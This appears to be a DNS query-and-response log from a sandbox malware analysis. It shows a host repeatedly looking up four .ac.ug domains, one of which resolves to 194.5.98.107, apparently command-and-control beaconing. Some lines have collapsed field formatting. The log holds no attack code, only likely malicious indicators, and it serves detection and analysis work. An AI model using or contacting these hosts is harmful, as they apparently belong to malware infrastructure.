Jun 26, 2022 09:46:41.707015991 CEST | 192.168.2.6 | 8.8.8.8 | 0x240d | Standard query (0) | parthaha.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:43.057265997 CEST | 192.168.2.6 | 8.8.8.8 | 0x9ca0 | Standard query (0) | nikahuve.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:44.241111040 CEST | 192.168.2.6 | 8.8.8.8 | 0x9c48 | Standard query (0) | kalskala.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:44.268326998 CEST | 192.168.2.6 | 8.8.8.8 | 0x3757 | Standard query (0) | tuekisaa.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:44.291924953 CEST | 192.168.2.6 | 8.8.8.8 | 0x53dd | Standard query (0) | parthaha.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:45.588435888 CEST | 192.168.2.6 | 8.8.8.8 | 0x2ff2 | Standard query (0) | nikahuve.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:46.926189899 CEST | 192.168.2.6 | 8.8.8.8 | 0x6ffb | Standard query (0) | kalskala.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:46.956815958 CEST | 192.168.2.6 | 8.8.8.8 | 0x23cd | Standard query (0) | tuekisaa.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:47.045470953 CEST | 192.168.2.6 | 8.8.8.8 | 0x4316 | Standard query (0) | parthaha.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:48.388694048 CEST | 192.168.2.6 | 8.8.8.8 | 0x97c2 | Standard query (0) | nikahuve.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:49.737145901 CEST | 192.168.2.6 | 8.8.8.8 | 0xdb06 | Standard query (0) | kalskala.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:49.759732962 CEST | 192.168.2.6 | 8.8.8.8 | 0x74d5 | Standard query (0) | tuekisaa.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:49.780446053 CEST | 192.168.2.6 | 8.8.8.8 | 0x30f5 | Standard query (0) | parthaha.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:51.131019115 CEST | 192.168.2.6 | 8.8.8.8 | 0x9b03 | Standard query (0) | nikahuve.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:52.489573956 CEST | 192.168.2.6 | 8.8.8.8 | 0x6a72 | Standard query (0) | kalskala.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:52.512449980 CEST | 192.168.2.6 | 8.8.8.8 | 0x88fa | Standard query (0) | tuekisaa.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:52.536928892 CEST | 192.168.2.6 | 8.8.8.8 | 0x4f30 | Standard query (0) | parthaha.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:53.803354025 CEST | 192.168.2.6 | 8.8.8.8 | 0xf1b8 | Standard query (0) | nikahuve.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:54.972790003 CEST | 192.168.2.6 | 8.8.8.8 | 0xa4b6 | Standard query (0) | kalskala.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:54.994334936 CEST | 192.168.2.6 | 8.8.8.8 | 0x3a03 | Standard query (0) | tuekisaa.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:55.015356064 CEST | 192.168.2.6 | 8.8.8.8 | 0xe6d2 | Standard query (0) | parthaha.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:56.287367105 CEST | 192.168.2.6 | 8.8.8.8 | 0x3ba8 | Standard query (0) | nikahuve.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:57.506583929 CEST | 192.168.2.6 | 8.8.8.8 | 0x8265 | Standard query (0) | kalskala.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:57.533893108 CEST | 192.168.2.6 | 8.8.8.8 | 0x4e6d | Standard query (0) | tuekisaa.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:57.560184956 CEST | 192.168.2.6 | 8.8.8.8 | 0xa2a0 | Standard query (0) | parthaha.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:58.850754976 CEST | 192.168.2.6 | 8.8.8.8 | 0x69ca | Standard query (0) | nikahuve.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:47:00.019772053 CEST | 192.168.2.6 | 8.8.8.8 | 0xef71 | Standard query (0) | kalskala.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:47:00.040926933 CEST | 192.168.2.6 | 8.8.8.8 | 0x54f | Standard query (0) | tuekisaa.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:47:00.064255953 CEST | 192.168.2.6 | 8.8.8.8 | 0x8b9 | Standard query (0) | parthaha.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:47:01.320076942 CEST | 192.168.2.6 | 8.8.8.8 | 0x2232 | Standard query (0) | nikahuve.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:47:02.488662004 CEST | 192.168.2.6 | 8.8.8.8 | 0xf642 | Standard query (0) | kalskala.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:47:02.834417105 CEST | 192.168.2.6 | 8.8.8.8 | 0xe751 | Standard query (0) | tuekisaa.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:47:02.855746984 CEST | 192.168.2.6 | 8.8.8.8 | 0x878c | Standard query (0) | parthaha.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:47:04.116741896 CEST | 192.168.2.6 | 8.8.8.8 | 0x9625 | Standard query (0) | nikahuve.ac.ug | A (IP address) | IN (0x0001)
                                                                    Jun 26, 2022 09:47:05.284356117 CEST192.168.2.68.8.8.80x196aStandard query (0)kalskala.ac.ugA (IP address)IN (0x0001)
                                                                    Jun 26, 2022 09:47:05.593838930 CEST192.168.2.68.8.8.80x5033Standard query (0)tuekisaa.ac.ugA (IP address)IN (0x0001)
                                                                    Jun 26, 2022 09:47:06.250915051 CEST192.168.2.68.8.8.80x9f4eStandard query (0)parthaha.ac.ugA (IP address)IN (0x0001)
                                                                    Jun 26, 2022 09:47:07.654623985 CEST192.168.2.68.8.8.80x74caStandard query (0)nikahuve.ac.ugA (IP address)IN (0x0001)
                                                                    Jun 26, 2022 09:47:08.926732063 CEST192.168.2.68.8.8.80xd8f7Standard query (0)kalskala.ac.ugA (IP address)IN (0x0001)
                                                                    Jun 26, 2022 09:47:09.218846083 CEST192.168.2.68.8.8.80xed77Standard query (0)tuekisaa.ac.ugA (IP address)IN (0x0001)
                                                                    Jun 26, 2022 09:47:09.238074064 CEST192.168.2.68.8.8.80x8f1Standard query (0)parthaha.ac.ugA (IP address)IN (0x0001)
                                                                    Jun 26, 2022 09:47:10.585858107 CEST192.168.2.68.8.8.80xbd0eStandard query (0)nikahuve.ac.ugA (IP address)IN (0x0001)
                                                                    Jun 26, 2022 09:47:11.740303040 CEST192.168.2.68.8.8.80x4e35Standard query (0)kalskala.ac.ugA (IP address)IN (0x0001)
                                                                    Jun 26, 2022 09:47:12.144227982 CEST192.168.2.68.8.8.80xe8faStandard query (0)tuekisaa.ac.ugA (IP address)IN (0x0001)
                                                                    Jun 26, 2022 09:47:12.167809010 CEST192.168.2.68.8.8.80xbac1Standard query (0)parthaha.ac.ugA (IP address)IN (0x0001)
                                                                    Jun 26, 2022 09:47:13.602176905 CEST192.168.2.68.8.8.80xad50Standard query (0)nikahuve.ac.ugA (IP address)IN (0x0001)
                                                                    Jun 26, 2022 09:47:14.769234896 CEST192.168.2.68.8.8.80xd077Standard query (0)kalskala.ac.ugA (IP address)IN (0x0001)
                                                                    Jun 26, 2022 09:47:14.792699099 CEST192.168.2.68.8.8.80xfd7cStandard query (0)tuekisaa.ac.ugA (IP address)IN (0x0001)
                                                                    Jun 26, 2022 09:47:15.100631952 CEST192.168.2.68.8.8.80x54e4Standard query (0)parthaha.ac.ugA (IP address)IN (0x0001)
                                                                    Jun 26, 2022 09:47:16.445960999 CEST192.168.2.68.8.8.80xcfd7Standard query (0)nikahuve.ac.ugA (IP address)IN (0x0001)
                                                                    Jun 26, 2022 09:47:17.613542080 CEST192.168.2.68.8.8.80xf6a9Standard query (0)kalskala.ac.ugA (IP address)IN (0x0001)
                                                                    Jun 26, 2022 09:47:17.632636070 CEST192.168.2.68.8.8.80xcfc1Standard query (0)tuekisaa.ac.ugA (IP address)IN (0x0001)
                                                                    Jun 26, 2022 09:47:17.922254086 CEST192.168.2.68.8.8.80xc18Standard query (0)parthaha.ac.ugA (IP address)IN (0x0001)
                                                                    Jun 26, 2022 09:47:19.196216106 CEST192.168.2.68.8.8.80x5d04Standard query (0)nikahuve.ac.ugA (IP address)IN (0x0001)
                                                                    Jun 26, 2022 09:47:20.366450071 CEST192.168.2.68.8.8.80x951dStandard query (0)kalskala.ac.ugA (IP address)IN (0x0001)
                                                                    Jun 26, 2022 09:47:20.390060902 CEST192.168.2.68.8.8.80xad41Standard query (0)tuekisaa.ac.ugA (IP address)IN (0x0001)
                                                                    Jun 26, 2022 09:47:20.413465977 CEST192.168.2.68.8.8.80x8a5bStandard query (0)parthaha.ac.ugA (IP address)IN (0x0001)
                                                                    Jun 26, 2022 09:47:21.696197987 CEST192.168.2.68.8.8.80x549bStandard query (0)nikahuve.ac.ugA (IP address)IN (0x0001)
                                                                    Jun 26, 2022 09:47:22.865897894 CEST192.168.2.68.8.8.80x72dfStandard query (0)kalskala.ac.ugA (IP address)IN (0x0001)
                                                                    Jun 26, 2022 09:47:22.975537062 CEST192.168.2.68.8.8.80x123Standard query (0)tuekisaa.ac.ugA (IP address)IN (0x0001)
                                                                    Jun 26, 2022 09:47:22.996891022 CEST192.168.2.68.8.8.80x5478Standard query (0)parthaha.ac.ugA (IP address)IN (0x0001)
                                                                    Jun 26, 2022 09:47:24.274667025 CEST192.168.2.68.8.8.80xdd42Standard query (0)nikahuve.ac.ugA (IP address)IN (0x0001)
                                                                    Jun 26, 2022 09:47:25.442476988 CEST192.168.2.68.8.8.80xc3aeStandard query (0)kalskala.ac.ugA (IP address)IN (0x0001)
                                                                    Jun 26, 2022 09:47:25.464106083 CEST192.168.2.68.8.8.80x699fStandard query (0)tuekisaa.ac.ugA (IP address)IN (0x0001)
                                                                    Jun 26, 2022 09:47:25.485399008 CEST192.168.2.68.8.8.80xf0deStandard query (0)parthaha.ac.ugA (IP address)IN (0x0001)
                                                                    Jun 26, 2022 09:47:26.744364023 CEST192.168.2.68.8.8.80x28dStandard query (0)nikahuve.ac.ugA (IP address)IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jun 26, 2022 09:45:59.609529972 CEST | 8.8.8.8 | 192.168.2.6 | 0x98be | No error (0) | nikahuve.ac.ug | | 194.5.98.107 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:01.287909031 CEST | 8.8.8.8 | 192.168.2.6 | 0x629e | Name error (3) | kalskala.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:01.668832064 CEST | 8.8.8.8 | 192.168.2.6 | 0x8c38 | Name error (3) | tuekisaa.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:02.335402966 CEST | 8.8.8.8 | 192.168.2.6 | 0xfc5b | Server failure (2) | parthaha.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:03.521174908 CEST | 8.8.8.8 | 192.168.2.6 | 0x96b2 | No error (0) | nikahuve.ac.ug | | 194.5.98.107 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:05.224469900 CEST | 8.8.8.8 | 192.168.2.6 | 0xad3d | Name error (3) | kalskala.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:05.407883883 CEST | 8.8.8.8 | 192.168.2.6 | 0xb7e9 | Name error (3) | tuekisaa.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:05.879934072 CEST | 8.8.8.8 | 192.168.2.6 | 0x1817 | Server failure (2) | parthaha.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:07.183330059 CEST | 8.8.8.8 | 192.168.2.6 | 0x8ef1 | No error (0) | nikahuve.ac.ug | | 194.5.98.107 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:08.825110912 CEST | 8.8.8.8 | 192.168.2.6 | 0xb4d | Name error (3) | kalskala.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:09.151824951 CEST | 8.8.8.8 | 192.168.2.6 | 0x6dc3 | Name error (3) | tuekisaa.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:09.415802002 CEST | 8.8.8.8 | 192.168.2.6 | 0x3ad1 | Server failure (2) | parthaha.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:10.522844076 CEST | 8.8.8.8 | 192.168.2.6 | 0x4e28 | No error (0) | nikahuve.ac.ug | | 194.5.98.107 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:13.254749060 CEST | 8.8.8.8 | 192.168.2.6 | 0x85c9 | Name error (3) | kalskala.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:13.417113066 CEST | 8.8.8.8 | 192.168.2.6 | 0x2bbe | Name error (3) | tuekisaa.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:13.861335993 CEST | 8.8.8.8 | 192.168.2.6 | 0x2d75 | Server failure (2) | parthaha.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:14.943308115 CEST | 8.8.8.8 | 192.168.2.6 | 0x15d6 | No error (0) | nikahuve.ac.ug | | 194.5.98.107 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:16.600392103 CEST | 8.8.8.8 | 192.168.2.6 | 0x3d72 | Name error (3) | kalskala.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:16.668729067 CEST | 8.8.8.8 | 192.168.2.6 | 0x2cf7 | Name error (3) | tuekisaa.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:17.050290108 CEST | 8.8.8.8 | 192.168.2.6 | 0x287e | Server failure (2) | parthaha.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:18.172508955 CEST | 8.8.8.8 | 192.168.2.6 | 0x7860 | No error (0) | nikahuve.ac.ug | | 194.5.98.107 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:19.946038008 CEST | 8.8.8.8 | 192.168.2.6 | 0x877b | Name error (3) | kalskala.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:20.489490032 CEST | 8.8.8.8 | 192.168.2.6 | 0xef63 | Name error (3) | tuekisaa.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:20.808574915 CEST | 8.8.8.8 | 192.168.2.6 | 0xf017 | Server failure (2) | parthaha.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:21.855746031 CEST | 8.8.8.8 | 192.168.2.6 | 0xb0c3 | No error (0) | nikahuve.ac.ug | | 194.5.98.107 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:23.251566887 CEST | 8.8.8.8 | 192.168.2.6 | 0xc28c | Name error (3) | kalskala.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:23.277683020 CEST | 8.8.8.8 | 192.168.2.6 | 0xc296 | Name error (3) | tuekisaa.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:23.900996923 CEST | 8.8.8.8 | 192.168.2.6 | 0x5a53 | Server failure (2) | parthaha.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:24.938805103 CEST | 8.8.8.8 | 192.168.2.6 | 0xb170 | No error (0) | nikahuve.ac.ug | | 194.5.98.107 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:26.206334114 CEST | 8.8.8.8 | 192.168.2.6 | 0x1c99 | Name error (3) | kalskala.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:26.233730078 CEST | 8.8.8.8 | 192.168.2.6 | 0x86e5 | Name error (3) | tuekisaa.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:26.787453890 CEST | 8.8.8.8 | 192.168.2.6 | 0xcd3 | Server failure (2) | parthaha.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:27.842549086 CEST | 8.8.8.8 | 192.168.2.6 | 0x62cc | No error (0) | nikahuve.ac.ug | | 194.5.98.107 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:29.182220936 CEST | 8.8.8.8 | 192.168.2.6 | 0x1261 | Name error (3) | kalskala.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:29.220069885 CEST | 8.8.8.8 | 192.168.2.6 | 0xc2c3 | Name error (3) | tuekisaa.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:29.535430908 CEST | 8.8.8.8 | 192.168.2.6 | 0x35a9 | Server failure (2) | parthaha.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:31.267640114 CEST | 8.8.8.8 | 192.168.2.6 | 0xa0ee | No error (0) | nikahuve.ac.ug | | 194.5.98.107 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:33.007348061 CEST | 8.8.8.8 | 192.168.2.6 | 0xa139 | Name error (3) | kalskala.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:33.037226915 CEST | 8.8.8.8 | 192.168.2.6 | 0x5df0 | Name error (3) | tuekisaa.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:33.318209887 CEST | 8.8.8.8 | 192.168.2.6 | 0x8bc1 | Server failure (2) | parthaha.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:34.429868937 CEST | 8.8.8.8 | 192.168.2.6 | 0x944e | No error (0) | nikahuve.ac.ug | | 194.5.98.107 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:35.827079058 CEST | 8.8.8.8 | 192.168.2.6 | 0x7aaa | Name error (3) | kalskala.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:35.855199099 CEST | 8.8.8.8 | 192.168.2.6 | 0xafcb | Name error (3) | tuekisaa.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:36.128879070 CEST | 8.8.8.8 | 192.168.2.6 | 0x1721 | Server failure (2) | parthaha.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:37.234436989 CEST | 8.8.8.8 | 192.168.2.6 | 0x8619 | No error (0) | nikahuve.ac.ug | | 194.5.98.107 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:38.417606115 CEST | 8.8.8.8 | 192.168.2.6 | 0x2497 | Name error (3) | kalskala.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:38.926244020 CEST | 8.8.8.8 | 192.168.2.6 | 0x118d | Name error (3) | tuekisaa.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:39.367716074 CEST | 8.8.8.8 | 192.168.2.6 | 0x2387 | Server failure (2) | parthaha.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:40.409852028 CEST | 8.8.8.8 | 192.168.2.6 | 0x7593 | No error (0) | nikahuve.ac.ug | | 194.5.98.107 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:41.579132080 CEST | 8.8.8.8 | 192.168.2.6 | 0xd5ea | Name error (3) | kalskala.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:41.702279091 CEST | 8.8.8.8 | 192.168.2.6 | 0xe5dd | Name error (3) | tuekisaa.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:42.044704914 CEST | 8.8.8.8 | 192.168.2.6 | 0x240d | Server failure (2) | parthaha.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:43.077081919 CEST | 8.8.8.8 | 192.168.2.6 | 0x9ca0 | No error (0) | nikahuve.ac.ug | | 194.5.98.107 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:44.260705948 CEST | 8.8.8.8 | 192.168.2.6 | 0x9c48 | Name error (3) | kalskala.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:44.287756920 CEST | 8.8.8.8 | 192.168.2.6 | 0x3757 | Name error (3) | tuekisaa.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:44.559916019 CEST | 8.8.8.8 | 192.168.2.6 | 0x53dd | Server failure (2) | parthaha.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:45.608629942 CEST | 8.8.8.8 | 192.168.2.6 | 0x2ff2 | No error (0) | nikahuve.ac.ug | | 194.5.98.107 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:46.948671103 CEST | 8.8.8.8 | 192.168.2.6 | 0x6ffb | Name error (3) | kalskala.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:46.984714985 CEST | 8.8.8.8 | 192.168.2.6 | 0x23cd | Name error (3) | tuekisaa.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:47.373270035 CEST | 8.8.8.8 | 192.168.2.6 | 0x4316 | Server failure (2) | parthaha.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:48.407943964 CEST | 8.8.8.8 | 192.168.2.6 | 0x97c2 | No error (0) | nikahuve.ac.ug | | 194.5.98.107 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:49.756731033 CEST | 8.8.8.8 | 192.168.2.6 | 0xdb06 | Name error (3) | kalskala.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:49.778947115 CEST | 8.8.8.8 | 192.168.2.6 | 0x74d5 | Name error (3) | tuekisaa.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:50.115060091 CEST | 8.8.8.8 | 192.168.2.6 | 0x30f5 | Server failure (2) | parthaha.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:51.151547909 CEST | 8.8.8.8 | 192.168.2.6 | 0x9b03 | No error (0) | nikahuve.ac.ug | | 194.5.98.107 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:52.510042906 CEST | 8.8.8.8 | 192.168.2.6 | 0x6a72 | Name error (3) | kalskala.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:52.535131931 CEST | 8.8.8.8 | 192.168.2.6 | 0x88fa | Name error (3) | tuekisaa.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:52.786977053 CEST | 8.8.8.8 | 192.168.2.6 | 0x4f30 | Server failure (2) | parthaha.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:53.820684910 CEST | 8.8.8.8 | 192.168.2.6 | 0xf1b8 | No error (0) | nikahuve.ac.ug | | 194.5.98.107 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:54.992006063 CEST | 8.8.8.8 | 192.168.2.6 | 0xa4b6 | Name error (3) | kalskala.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:55.012367964 CEST | 8.8.8.8 | 192.168.2.6 | 0x3a03 | Name error (3) | tuekisaa.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:55.273374081 CEST | 8.8.8.8 | 192.168.2.6 | 0xe6d2 | Server failure (2) | parthaha.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:56.363706112 CEST | 8.8.8.8 | 192.168.2.6 | 0x3ba8 | No error (0) | nikahuve.ac.ug | | 194.5.98.107 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:57.528808117 CEST | 8.8.8.8 | 192.168.2.6 | 0x8265 | Name error (3) | kalskala.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:57.558281898 CEST | 8.8.8.8 | 192.168.2.6 | 0x4e6d | Name error (3) | tuekisaa.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:57.833945036 CEST | 8.8.8.8 | 192.168.2.6 | 0xa2a0 | Server failure (2) | parthaha.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:58.872860909 CEST | 8.8.8.8 | 192.168.2.6 | 0x69ca | No error (0) | nikahuve.ac.ug | | 194.5.98.107 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:47:00.037149906 CEST | 8.8.8.8 | 192.168.2.6 | 0xef71 | Name error (3) | kalskala.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:47:00.062521935 CEST | 8.8.8.8 | 192.168.2.6 | 0x54f | Name error (3) | tuekisaa.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:47:00.309726000 CEST | 8.8.8.8 | 192.168.2.6 | 0x8b9 | Server failure (2) | parthaha.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:47:01.341156960 CEST | 8.8.8.8 | 192.168.2.6 | 0x2232 | No error (0) | nikahuve.ac.ug | | 194.5.98.107 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:47:02.832598925 CEST | 8.8.8.8 | 192.168.2.6 | 0xf642 | Name error (3) | kalskala.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:47:02.853538036 CEST | 8.8.8.8 | 192.168.2.6 | 0xe751 | Name error (3) | tuekisaa.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:47:03.110609055 CEST | 8.8.8.8 | 192.168.2.6 | 0x878c | Server failure (2) | parthaha.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:47:04.133922100 CEST | 8.8.8.8 | 192.168.2.6 | 0x9625 | No error (0) | nikahuve.ac.ug | | 194.5.98.107 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:47:05.592148066 CEST | 8.8.8.8 | 192.168.2.6 | 0x196a | Name error (3) | kalskala.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:47:05.879611015 CEST | 8.8.8.8 | 192.168.2.6 | 0x5033 | Name error (3) | tuekisaa.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:47:06.517442942 CEST | 8.8.8.8 | 192.168.2.6 | 0x9f4e | Server failure (2) | parthaha.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:47:07.788269043 CEST | 8.8.8.8 | 192.168.2.6 | 0x74ca | No error (0) | nikahuve.ac.ug | | 194.5.98.107 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:47:09.216793060 CEST | 8.8.8.8 | 192.168.2.6 | 0xd8f7 | Name error (3) | kalskala.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:47:09.236004114 CEST | 8.8.8.8 | 192.168.2.6 | 0xed77 | Name error (3) | tuekisaa.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:47:09.571846008 CEST | 8.8.8.8 | 192.168.2.6 | 0x8f1 | Server failure (2) | parthaha.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:47:10.603106976 CEST | 8.8.8.8 | 192.168.2.6 | 0xbd0e | No error (0) | nikahuve.ac.ug | | 194.5.98.107 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:47:12.141793966 CEST | 8.8.8.8 | 192.168.2.6 | 0x4e35 | Name error (3) | kalskala.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:47:12.163436890 CEST | 8.8.8.8 | 192.168.2.6 | 0xe8fa | Name error (3) | tuekisaa.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:47:12.589550972 CEST | 8.8.8.8 | 192.168.2.6 | 0xbac1 | Server failure (2) | parthaha.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:47:13.621402979 CEST | 8.8.8.8 | 192.168.2.6 | 0xad50 | No error (0) | nikahuve.ac.ug | | 194.5.98.107 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:47:14.788824081 CEST | 8.8.8.8 | 192.168.2.6 | 0xd077 | Name error (3) | kalskala.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:47:15.098356962 CEST | 8.8.8.8 | 192.168.2.6 | 0xfd7c | Name error (3) | tuekisaa.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:47:15.432835102 CEST | 8.8.8.8 | 192.168.2.6 | 0x54e4 | Server failure (2) | parthaha.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:47:16.467267990 CEST | 8.8.8.8 | 192.168.2.6 | 0xcfd7 | No error (0) | nikahuve.ac.ug | | 194.5.98.107 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:47:17.630446911 CEST | 8.8.8.8 | 192.168.2.6 | 0xf6a9 | Name error (3) | kalskala.ac.ug | none | none | A (IP address) | IN (0x0001)
Jun 26, 2022 09:47:17.920314074 CEST | 8.8.8.8 | 192.168.2.6 | 0xcfc1 | Name error (3) | tuekisaa.ac.ug | none | none | A (IP address) | IN (0x0001)
